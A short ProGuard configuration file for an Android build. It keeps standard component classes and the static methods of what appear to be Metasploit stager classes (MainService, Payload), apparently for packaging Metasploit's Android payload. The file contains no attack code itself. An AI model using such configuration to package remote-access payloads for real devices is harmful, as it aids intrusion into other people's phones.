# Preserve all classes from the Java standard library
-keep class java.lang.** { *; }

-keep public class * extends android.app.Activity
-keep public class * extends android.app.Service
-keep public class * extends android.content.BroadcastReceiver
-keep class com.metasploit.stage.MainService {
    public static <methods>;
}
-keep class com.metasploit.stage.Payload {
    public static <methods>;
}
-optimizationpasses 5
-verbose

